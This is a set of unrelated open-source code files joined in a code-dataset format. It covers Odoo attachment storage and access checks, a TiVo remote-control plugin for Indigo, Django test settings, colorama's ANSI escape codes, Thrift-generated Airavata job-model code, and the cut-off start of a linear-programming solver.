_logger.error("_read_file reading %s",full_path)
return r
def _file_write(self, cr, uid, value):
bin_value = value.decode('base64')
fname, full_path = self._get_path(cr, uid, bin_value)
if not os.path.exists(full_path):
try:
with open(full_path, 'wb') as fp:
fp.write(bin_value)
except IOError:
_logger.error("_file_write writing %s", full_path)
return fname
def _file_delete(self, cr, uid, fname):
count = self.search(cr, 1, [('store_fname','=',fname)], count=True)
full_path = self._full_path(cr, uid, fname)
if count <= 1 and os.path.exists(full_path):
try:
os.unlink(full_path)
except OSError:
_logger.error("_file_delete could not unlink %s",full_path)
except IOError:
# Harmless and needed for race conditions
_logger.error("_file_delete could not unlink %s",full_path)
def _data_get(self, cr, uid, ids, name, arg, context=None):
if context is None:
context = {}
result = {}
bin_size = context.get('bin_size')
for attach in self.browse(cr, uid, ids, context=context):
if attach.store_fname:
result[attach.id] = self._file_read(cr, uid, attach.store_fname, bin_size)
else:
result[attach.id] = attach.db_datas
return result
def _data_set(self, cr, uid, id, name, value, arg, context=None):
# We don't handle setting data to null
if not value:
return True
if context is None:
context = {}
location = self._storage(cr, uid, context)
file_size = len(value.decode('base64'))
attach = self.browse(cr, uid, id, context=context)
if attach.store_fname:
self._file_delete(cr, uid, attach.store_fname)
if location != 'db':
fname = self._file_write(cr, uid, value)
# write as SUPERUSER_ID since the user probably lacks write access; triggered during create
super(ir_attachment, self).write(cr, SUPERUSER_ID, [id], {'store_fname': fname, 'file_size': file_size, 'db_datas': False}, context=context)
else:
super(ir_attachment, self).write(cr, SUPERUSER_ID, [id], {'db_datas': value, 'file_size': file_size, 'store_fname': False}, context=context)
return True
_name = 'ir.attachment'
_columns = {
'name': fields.char('Attachment Name', required=True),
'datas_fname': fields.char('File Name'),
'description': fields.text('Description'),
'res_name': fields.function(_name_get_resname, type='char', string='Resource Name', store=True),
'res_model': fields.char('Resource Model', readonly=True, help="The database object this attachment will be attached to"),
'res_id': fields.integer('Resource ID', readonly=True, help="The record id this is attached to"),
'create_date': fields.datetime('Date Created', readonly=True),
'create_uid': fields.many2one('res.users', 'Owner', readonly=True),
'company_id': fields.many2one('res.company', 'Company', change_default=True),
'type': fields.selection( [ ('url','URL'), ('binary','Binary'), ],
'Type', help="Binary File or URL", required=True, change_default=True),
'url': fields.char('Url', size=1024),
# al: We keep shitty field names for backward compatibility with document
'datas': fields.function(_data_get, fnct_inv=_data_set, string='File Content', type="binary", nodrop=True),
'store_fname': fields.char('Stored Filename'),
'db_datas': fields.binary('Database Data'),
'file_size': fields.integer('File Size'),
}
_defaults = {
'type': 'binary',
'file_size': 0,
'company_id': lambda s,cr,uid,c: s.pool.get('res.company')._company_default_get(cr, uid, 'ir.attachment', context=c),
}
def _auto_init(self, cr, context=None):
super(ir_attachment, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('ir_attachment_res_idx',))
if not cr.fetchone():
cr.execute('CREATE INDEX ir_attachment_res_idx ON ir_attachment (res_model, res_id)')
cr.commit()
def check(self, cr, uid, ids, mode, context=None, values=None):
"""Restricts the access to an ir.attachment, according to referred model
In the 'document' module, it is overriden to relax this hard rule, since
more complex ones apply there.
"""
res_ids = {}
if ids:
if isinstance(ids, (int, long)):
ids = [ids]
cr.execute('SELECT DISTINCT res_model, res_id FROM ir_attachment WHERE id = ANY (%s)', (ids,))
for rmod, rid in cr.fetchall():
if not (rmod and rid):
continue
res_ids.setdefault(rmod,set()).add(rid)
if values:
if values.get('res_model') and values.get('res_id'):
res_ids.setdefault(values['res_model'],set()).add(values['res_id'])
ima = self.pool.get('ir.model.access')
for model, mids in res_ids.items():
# ignore attachments that are not attached to a resource anymore when checking access rights
# (resource was deleted but attachment was not)
mids = self.pool[model].exists(cr, uid, mids)
ima.check(cr, uid, model, mode)
self.pool[model].check_access_rule(cr, uid, mids, mode, context=context)
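# Illustrative consequence (hedged): reading an attachment linked to a
# res.partner record, e.g.
#   self.pool['ir.attachment'].check(cr, uid, [attach_id], 'read')
# delegates to ir.model.access and the record rules of res.partner, so the
# call raises unless the user may read the partner the file is attached to.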
def _search(self, cr, uid, args, offset=0, limit=None, order=None, context=None, count=False, access_rights_uid=None):
ids = super(ir_attachment, self)._search(cr, uid, args, offset=offset,
limit=limit, order=order,
context=context, count=False,
access_rights_uid=access_rights_uid)
if not ids:
if count:
return 0
return []
# Work with a set, as list.remove() is prohibitive for large lists of documents
# (takes 20+ seconds on a db with 100k docs during search_count()!)
orig_ids = ids
ids = set(ids)
# For attachments, the permissions of the document they are attached to
# apply, so we must remove attachments for which the user cannot access
# the linked document.
# Use pure SQL rather than read() as it is about 50% faster for large dbs (100k+ docs),
# and the permissions are checked in super() and below anyway.
cr.execute("""SELECT id, res_model, res_id FROM ir_attachment WHERE id = ANY(%s)""", (list(ids),))
targets = cr.dictfetchall()
model_attachments = {}
for target_dict in targets:
if not target_dict['res_model']:
continue
# model_attachments = { 'model': { 'res_id': [id1,id2] } }
model_attachments.setdefault(target_dict['res_model'],{}).setdefault(target_dict['res_id'] or 0, set()).add(target_dict['id'])
# To avoid multiple queries for each attachment found, checks are
# performed in batch as much as possible.
ima = self.pool.get('ir.model.access')
for model, targets in model_attachments.iteritems():
if not self.pool.get(model):
continue
if not ima.check(cr, uid, model, 'read', False):
# remove all corresponding attachment ids
for attach_id in itertools.chain(*targets.values()):
ids.remove(attach_id)
continue # skip ir.rule processing, these ones are out already
# filter ids according to what access rules permit
target_ids = targets.keys()
allowed_ids = [0] + self.pool[model].search(cr, uid, [('id', 'in', target_ids)], context=context)
disallowed_ids = set(target_ids).difference(allowed_ids)
for res_id in disallowed_ids:
for attach_id in targets[res_id]:
ids.remove(attach_id)
# sort result according to the original sort ordering
result = [id for id in orig_ids if id in ids]
return len(result) if count else list(result)
def read(self, cr, uid, ids, fields_to_read=None, context=None, load='_classic_read'):
if isinstance(ids, (int, long)):
ids = [ids]
self.check(cr, uid, ids, 'read', context=context)
return super(ir_attachment, self).read(cr, uid, ids, fields_to_read, context, load)
def write(self, cr, uid, ids, vals, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
self.check(cr, uid, ids, 'write', context=context, values=vals)
if 'file_size' in vals:
del vals['file_size']
return super(ir_attachment, self).write(cr, uid, ids, vals, context)
def copy(self, cr, uid, id, default=None, context=None):
self.check(cr, uid, [id], 'write', context=context)
return super(ir_attachment, self).copy(cr, uid, id, default, context)
def unlink(self, cr, uid, ids, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
self.check(cr, uid, ids, 'unlink', context=context)
for attach in self.browse(cr, uid, ids, context=context):
if attach.store_fname:
self._file_delete(cr, uid, attach.store_fname)
return super(ir_attachment, self).unlink(cr, uid, ids, context)
def create(self, cr, uid, values, context=None):
self.check(cr, uid, [], mode='write', context=context, values=values)
if 'file_size' in values:
del values['file_size']
return super(ir_attachment, self).create(cr, uid, values, context)
def action_get(self, cr, uid, context=None):
return self.pool.get('ir.actions.act_window').for_xml_id(
cr, uid, 'base', 'action_attachment', context=context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
RogueProeliator/IndigoPlugin-TiVo-Network-Remote | TiVo Network Remote.indigoPlugin/Contents/Server Plugin/plugin.py | 1 | 10778 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# TiVo Network Remote Control by RogueProeliator <rp@rogueproeliator.com>
# Indigo plugin designed to allow control of Series 3+ TiVo devices via control
# pages using TiVo's built-in telnet interface designed for home automation
# (Creston) systems.
#
# Command structure based on work done via the TiVo Community and documented
# here: http://www.tivo.com/assets/images/abouttivo/resources/downloads/brochures/TiVo_TCP_Network_Remote_Control_Protocol_073108.pdf
#
# Version 1.0:
# Initial release of the plugin
# Version 1.1:
# Plugin converted to RPFramework
# Added debug level options & menu item toggle
# Added channel tracking device state
# Added channel selector state/actions
# Version 1.1.6:
# Added Standby IR code
# Changed version check URL
# Version 1.2.8:
# Added better auto-discovery of the TiVo name and software version
# Implement auto-reconnect for disconnected/failed connections
# Version 2.0.1:
# Updated API to use Indigo 7 API calls
#
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# Python imports
#/////////////////////////////////////////////////////////////////////////////////////////
import os
import random
import re
import select
import socket
import string
import struct
import telnetlib
import RPFramework
import tivoRemoteDevice
#/////////////////////////////////////////////////////////////////////////////////////////
# Constants and configuration variables
#/////////////////////////////////////////////////////////////////////////////////////////
# beacon template for use when finding TiVo devices or for when attempting to get more
# information about them (name/version)
ANNOUNCE = """tivoconnect=1
method=%(method)s
platform=pc
identity=remote-%(port)x
services=TiVoMediaServer:%(port)d/http
"""
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# Plugin
# Primary Indigo plugin class that is universal for all devices (TiVo instances) to be
# controlled
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
class Plugin(RPFramework.RPFrameworkPlugin.RPFrameworkPlugin):
#/////////////////////////////////////////////////////////////////////////////////////
# Class construction and destruction methods
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Constructor called once upon plugin class creation; setup the device tracking
# variables for later use
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def __init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs):
# RP framework base class's init method
super(Plugin, self).__init__(pluginId, pluginDisplayName, pluginVersion, pluginPrefs, managedDeviceClassModule=tivoRemoteDevice)
#/////////////////////////////////////////////////////////////////////////////////////
# Data Validation functions... these functions allow the plugin or devices to validate
# user input
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will be called to validate the information entered into the Device
# configuration GUI from within Indigo
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def validateDeviceConfigUiEx(self, valuesDict, deviceTypeId, devId):
# check to see if there are already devices created for this plugin using the same
# IP address
for dev in indigo.devices.iter(u'self'):
if devId != dev.id:
if dev.pluginProps.get(u'tivoIPAddress') == valuesDict[u'tivoIPAddress']:
errorMsgDict = indigo.Dict()
errorMsgDict[u'tivoIPAddress'] = u'Device "' + dev.name + u'" already set to use this IP Address. You cannot have two Indigo devices attached to the same TiVo device.'
return (False, valuesDict, errorMsgDict)
# user input is all valid
return (True, valuesDict)
#/////////////////////////////////////////////////////////////////////////////////////
# Configuration and Action Dialog Callbacks
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will be called from the user executing the menu item action to send
# an arbitrary command code to the TiVo device
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def sendArbitraryCommand(self, valuesDict, typeId):
try:
deviceId = valuesDict.get(u'targetDevice', u'0')
commandCode = valuesDict.get(u'commandToSend', u'').strip()
if deviceId == u'' or deviceId == u'0':
# no device was selected
errorDict = indigo.Dict()
errorDict[u'targetDevice'] = u'Please select a device'
return (False, valuesDict, errorDict)
elif commandCode == u'':
errorDict = indigo.Dict()
errorDict[u'commandToSend'] = u'Enter command to send'
return (False, valuesDict, errorDict)
else:
# send the code using the normal action processing...
actionParams = indigo.Dict()
actionParams[u'commandCode'] = commandCode
self.executeAction(pluginAction=None, indigoActionId=u'sendArbitraryCommand', indigoDeviceId=int(deviceId), paramValues=actionParams)
return (True, valuesDict)
except:
self.exceptionLog()
return (False, valuesDict)
#/////////////////////////////////////////////////////////////////////////////////////
# Utility / helper routines
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine is called back to the plugin when the GUI configuration loads... it
# should allow for selecting a TiVo device via a drop-down
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def findTiVoDevices(self, filter="", valuesDict=None, typeId="", targetId=0):
tcd_id = re.compile('TiVo_TCD_ID: (.*)\r\n').findall
tcds = {}
# we must set up a listening server in order to listen for the TiVo replies, but
# the port does not matter... find an available one
hsock = socket.socket()
attempts = 0
while True:
port = random.randint(0x8000, 0xffff)
try:
hsock.bind(('', port))
break
except:
attempts += 1
if attempts == 7:
# can't bind to a port... return an empty list
return []
hsock.listen(5)
# broadcast an announcement so that the TiVos will respond
method = 'broadcast'
try:
usock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
usock.sendto(ANNOUNCE % locals(), ('255.255.255.255', 2190))
usock.close()
except:
hsock.close()
# the announcement broadcast failed.
return []
# collect the queries made in response; these return quickly
while True:
isock, junk1, junk2 = select.select([hsock], [], [], 1)
if not isock:
break
client, address = hsock.accept()
message = client.recv(1500)
client.close()
tcd = tcd_id(message)[0]
if tcd[0] >= '6' and tcd[:3] != '649': # only series 3 & 4 TiVos are supported
tcds[tcd] = address[0]
hsock.close()
# unfortunately the HTTP requests don't include the machine names,
# so we find them by making direct TCD connections to each TiVo
tivos = []
for tcd, address in tcds.items():
name, version = self.getTiVoNameAndVersion(address)
tivos.append((address, RPFramework.RPFrameworkUtils.to_unicode(name) + u' (v' + RPFramework.RPFrameworkUtils.to_unicode(version) + u')'))
return tivos
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will exchange TiVo Connect Discovery beacons in order to extract the
# name and software version
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def getTiVoNameAndVersion(self, address):
method = 'connected'
port = 0
our_beacon = ANNOUNCE % locals()
machine_name = re.compile('machine=(.*)\n').findall
swversion = re.compile('swversion=(\d*.\d*)').findall
try:
tsock = socket.socket()
tsock.connect((address, 2190))
tsock.sendall(struct.pack('!I', len(our_beacon)) + our_beacon)
length = struct.unpack('!I', self.receiveBytesFromSocket(tsock, 4))[0]
tivo_beacon = self.receiveBytesFromSocket(tsock, length)
tsock.close()
self.logger.threaddebug(u'Received beacon: ' + tivo_beacon)
name = machine_name(tivo_beacon)[0]
version = float(swversion(tivo_beacon)[0])
except:
name = address
version = 0.0
if self.debug == True:
self.exceptionLog()
return name, version
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Reads the specified number of bytes from the socket
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def receiveBytesFromSocket(self, sock, length):
block = ''
while len(block) < length:
add = sock.recv(length - len(block))
if not add:
break
block += add
return block
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine may be used by plugins to perform any upgrades specific to the plugin;
# it will be called following the framework's update processing
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def performPluginUpgrade(self, oldVersion, newVersion):
if oldVersion == u'':
pluginBasePath = os.getcwd()
jsonFilePath = os.path.join(pluginBasePath, "json.py")
if os.path.exists(jsonFilePath):
os.remove(jsonFilePath)
self.logger.debug(u'Removed obsolete json.py file')
jsonCompiledFilePath = os.path.join(pluginBasePath, "json.pyc")
if os.path.exists(jsonCompiledFilePath):
os.remove(jsonCompiledFilePath)
self.logger.debug(u'Removed obsolete json.pyc file')
| mit |
askinteractive/mezzanine-advanced-admin | test_mezzanine_advanced_admin/test_mezzanine_advanced_admin/settings.py | 1 | 2566 | """
Django settings for test_mezzanine_advanced_admin project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3!^@q06fn2-zl%2f%rmux58ybi9u=9k_lq^k*+^429foc#7fzn'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'bootstrap3',
'mezzanine_advanced_admin',
'filer',
'easy_thumbnails',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'test_mezzanine_advanced_admin',
'CapitalApp',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.i18n',
)
ROOT_URLCONF = 'test_mezzanine_advanced_admin.urls'
WSGI_APPLICATION = 'test_mezzanine_advanced_admin.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
ADVANCED_ADMIN_FIELD_RENDERER = 'mezzanine_advanced_admin.renderers.BootstrapFieldRenderer'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| apache-2.0 |
bhairavmehta95/flashcard-helper-alexa-skill | venv/lib/python2.7/site-packages/pip/_vendor/colorama/ansi.py | 640 | 2524 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
'''
This module generates ANSI character codes for printing colors to terminals.
See: http://en.wikipedia.org/wiki/ANSI_escape_code
'''
CSI = '\033['
OSC = '\033]'
BEL = '\007'
def code_to_chars(code):
return CSI + str(code) + 'm'
def set_title(title):
return OSC + '2;' + title + BEL
def clear_screen(mode=2):
return CSI + str(mode) + 'J'
def clear_line(mode=2):
return CSI + str(mode) + 'K'
class AnsiCodes(object):
def __init__(self):
# the subclasses declare class attributes which are numbers.
# Upon instantiation we define instance attributes, which are the same
# as the class attributes but wrapped with the ANSI escape sequence
for name in dir(self):
if not name.startswith('_'):
value = getattr(self, name)
setattr(self, name, code_to_chars(value))
class AnsiCursor(object):
def UP(self, n=1):
return CSI + str(n) + 'A'
def DOWN(self, n=1):
return CSI + str(n) + 'B'
def FORWARD(self, n=1):
return CSI + str(n) + 'C'
def BACK(self, n=1):
return CSI + str(n) + 'D'
def POS(self, x=1, y=1):
return CSI + str(y) + ';' + str(x) + 'H'
class AnsiFore(AnsiCodes):
BLACK = 30
RED = 31
GREEN = 32
YELLOW = 33
BLUE = 34
MAGENTA = 35
CYAN = 36
WHITE = 37
RESET = 39
# These are fairly well supported, but not part of the standard.
LIGHTBLACK_EX = 90
LIGHTRED_EX = 91
LIGHTGREEN_EX = 92
LIGHTYELLOW_EX = 93
LIGHTBLUE_EX = 94
LIGHTMAGENTA_EX = 95
LIGHTCYAN_EX = 96
LIGHTWHITE_EX = 97
class AnsiBack(AnsiCodes):
BLACK = 40
RED = 41
GREEN = 42
YELLOW = 43
BLUE = 44
MAGENTA = 45
CYAN = 46
WHITE = 47
RESET = 49
# These are fairly well supported, but not part of the standard.
LIGHTBLACK_EX = 100
LIGHTRED_EX = 101
LIGHTGREEN_EX = 102
LIGHTYELLOW_EX = 103
LIGHTBLUE_EX = 104
LIGHTMAGENTA_EX = 105
LIGHTCYAN_EX = 106
LIGHTWHITE_EX = 107
class AnsiStyle(AnsiCodes):
BRIGHT = 1
DIM = 2
NORMAL = 22
RESET_ALL = 0
Fore = AnsiFore()
Back = AnsiBack()
Style = AnsiStyle()
Cursor = AnsiCursor()
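# Illustrative usage (hedged; colorama.init() from the package's initialise
# module is normally called first on Windows):
#
#   print(Fore.RED + 'error' + Style.RESET_ALL)
#   print(Back.GREEN + 'ok' + Style.RESET_ALL)
#   print(Cursor.POS(10, 5) + 'at column 10, row 5')
#
# Each attribute is just the pre-rendered escape string, e.g.
# Fore.RED == '\033[31m'.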
| mit |
jjj117/airavata | airavata-api/airavata-client-sdks/airavata-python-sdk/src/main/resources/lib/apache/airavata/model/job/ttypes.py | 2 | 8174 | #
# Autogenerated by Thrift Compiler (0.9.2)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import apache.airavata.model.status.ttypes
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class JobModel:
"""
Attributes:
- jobId
- taskId
- processId
- jobDescription
- creationTime
- jobStatus
- computeResourceConsumed
- jobName
- workingDir
- stdOut
- stdErr
- exitCode
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'jobId', None, None, ), # 1
(2, TType.STRING, 'taskId', None, None, ), # 2
(3, TType.STRING, 'processId', None, None, ), # 3
(4, TType.STRING, 'jobDescription', None, None, ), # 4
(5, TType.I64, 'creationTime', None, None, ), # 5
(6, TType.STRUCT, 'jobStatus', (apache.airavata.model.status.ttypes.JobStatus, apache.airavata.model.status.ttypes.JobStatus.thrift_spec), None, ), # 6
(7, TType.STRING, 'computeResourceConsumed', None, None, ), # 7
(8, TType.STRING, 'jobName', None, None, ), # 8
(9, TType.STRING, 'workingDir', None, None, ), # 9
(10, TType.STRING, 'stdOut', None, None, ), # 10
(11, TType.STRING, 'stdErr', None, None, ), # 11
(12, TType.I32, 'exitCode', None, None, ), # 12
)
def __init__(self, jobId=None, taskId=None, processId=None, jobDescription=None, creationTime=None, jobStatus=None, computeResourceConsumed=None, jobName=None, workingDir=None, stdOut=None, stdErr=None, exitCode=None,):
self.jobId = jobId
self.taskId = taskId
self.processId = processId
self.jobDescription = jobDescription
self.creationTime = creationTime
self.jobStatus = jobStatus
self.computeResourceConsumed = computeResourceConsumed
self.jobName = jobName
self.workingDir = workingDir
self.stdOut = stdOut
self.stdErr = stdErr
self.exitCode = exitCode
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.jobId = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.taskId = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.processId = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.jobDescription = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I64:
self.creationTime = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.jobStatus = apache.airavata.model.status.ttypes.JobStatus()
self.jobStatus.read(iprot)
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRING:
self.computeResourceConsumed = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.STRING:
self.jobName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.STRING:
self.workingDir = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.STRING:
self.stdOut = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.STRING:
self.stdErr = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.I32:
self.exitCode = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('JobModel')
if self.jobId is not None:
oprot.writeFieldBegin('jobId', TType.STRING, 1)
oprot.writeString(self.jobId)
oprot.writeFieldEnd()
if self.taskId is not None:
oprot.writeFieldBegin('taskId', TType.STRING, 2)
oprot.writeString(self.taskId)
oprot.writeFieldEnd()
if self.processId is not None:
oprot.writeFieldBegin('processId', TType.STRING, 3)
oprot.writeString(self.processId)
oprot.writeFieldEnd()
if self.jobDescription is not None:
oprot.writeFieldBegin('jobDescription', TType.STRING, 4)
oprot.writeString(self.jobDescription)
oprot.writeFieldEnd()
if self.creationTime is not None:
oprot.writeFieldBegin('creationTime', TType.I64, 5)
oprot.writeI64(self.creationTime)
oprot.writeFieldEnd()
if self.jobStatus is not None:
oprot.writeFieldBegin('jobStatus', TType.STRUCT, 6)
self.jobStatus.write(oprot)
oprot.writeFieldEnd()
if self.computeResourceConsumed is not None:
oprot.writeFieldBegin('computeResourceConsumed', TType.STRING, 7)
oprot.writeString(self.computeResourceConsumed)
oprot.writeFieldEnd()
if self.jobName is not None:
oprot.writeFieldBegin('jobName', TType.STRING, 8)
oprot.writeString(self.jobName)
oprot.writeFieldEnd()
if self.workingDir is not None:
oprot.writeFieldBegin('workingDir', TType.STRING, 9)
oprot.writeString(self.workingDir)
oprot.writeFieldEnd()
if self.stdOut is not None:
oprot.writeFieldBegin('stdOut', TType.STRING, 10)
oprot.writeString(self.stdOut)
oprot.writeFieldEnd()
if self.stdErr is not None:
oprot.writeFieldBegin('stdErr', TType.STRING, 11)
oprot.writeString(self.stdErr)
oprot.writeFieldEnd()
if self.exitCode is not None:
oprot.writeFieldBegin('exitCode', TType.I32, 12)
oprot.writeI32(self.exitCode)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.jobId is None:
raise TProtocol.TProtocolException(message='Required field jobId is unset!')
if self.taskId is None:
raise TProtocol.TProtocolException(message='Required field taskId is unset!')
if self.processId is None:
raise TProtocol.TProtocolException(message='Required field processId is unset!')
if self.jobDescription is None:
raise TProtocol.TProtocolException(message='Required field jobDescription is unset!')
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.jobId)
value = (value * 31) ^ hash(self.taskId)
value = (value * 31) ^ hash(self.processId)
value = (value * 31) ^ hash(self.jobDescription)
value = (value * 31) ^ hash(self.creationTime)
value = (value * 31) ^ hash(self.jobStatus)
value = (value * 31) ^ hash(self.computeResourceConsumed)
value = (value * 31) ^ hash(self.jobName)
value = (value * 31) ^ hash(self.workingDir)
value = (value * 31) ^ hash(self.stdOut)
value = (value * 31) ^ hash(self.stdErr)
value = (value * 31) ^ hash(self.exitCode)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
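# Minimal round-trip sketch (kept as comments; it relies only on the Thrift
# 0.9.2 runtime imported above, and field names follow this class's thrift_spec):
#
#   buf = TTransport.TMemoryBuffer()
#   job = JobModel(jobId='j-1', taskId='t-1', processId='p-1',
#                  jobDescription='demo')
#   job.validate()
#   job.write(TBinaryProtocol.TBinaryProtocol(buf))
#   clone = JobModel()
#   clone.read(TBinaryProtocol.TBinaryProtocol(TTransport.TMemoryBuffer(buf.getvalue())))
#   assert clone == job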
| apache-2.0 |
burakbayramli/dersblog | func_analysis/func_60_primdual/pdl.py | 2 | 2494 | import numpy as np
from scipy.optimize import linprog
from numpy.linalg import matrix_rank
import sympy  # used below to find pivot rows when A is rank-deficient
def solve(c, A, b, epsilon=0.0001):
if matrix_rank(A) < min(A.shape[0], A.shape[1]):
print('A is not full rank, dropping redundant rows')
